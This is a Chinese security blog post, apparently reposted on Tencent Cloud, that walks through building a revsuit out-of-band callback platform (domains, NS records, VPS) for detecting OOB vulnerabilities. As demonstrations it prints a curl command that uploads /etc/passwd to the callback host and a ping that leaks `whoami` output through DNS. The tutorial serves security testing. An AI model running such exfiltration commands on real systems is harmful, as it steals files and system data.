前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >搭建反连平台检测oob漏洞

搭建反连平台检测oob漏洞

作者头像
字节脉搏实验室
发布2022-11-23 14:23:58
1.1K0
发布2022-11-23 14:23:58
举报

文章源自【字节脉搏社区】-字节脉搏实验室

作者-K.Fire

注册域名nameserver.com 和payload.com 购买带有公网IP的VPS 1.1.1.1

建立nameserver,nameserver.com添加解析记录

更改payload.com的nameservers指向

NS1.NAMESERVER.COM/NS2.NAMESERVER.COM

这样payload.com的域名解析请求将由nameserver.com完成,同时将nameserver.com指向你的反连平台1.1.1.1

搭建反连平台

https://github.com/Li4n0/revsuit/releases先运行一遍以便生成数据库和配置文件,修改config.yaml

在VPS 1.1.1.1 上运行服务端

访问 http://nameserver.com/revsuit/admin/

输入token 即可进入

演示http logs

新建http log 规则

在靶机8.8.8.8上输入 curl

http://nameserver.com/testhttplog -F file=@/etc/passwd

效果展示:

演示dnslogs

新建dns log 规则

在靶机8.8.8.8上输入

ping `whoami`.payload.com

效果展示:

其他不一一展示

//

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-07-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
弹性公网 IP
弹性公网 IP(Elastic IP,EIP)是可以独立购买和持有,且在某个地域下固定不变的公网 IP 地址,可以与 CVM、NAT 网关、弹性网卡和高可用虚拟 IP 等云资源绑定,提供访问公网和被公网访问能力;还可与云资源的生命周期解耦合,单独进行操作;同时提供多种计费模式,您可以根据业务特点灵活选择,以降低公网成本。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档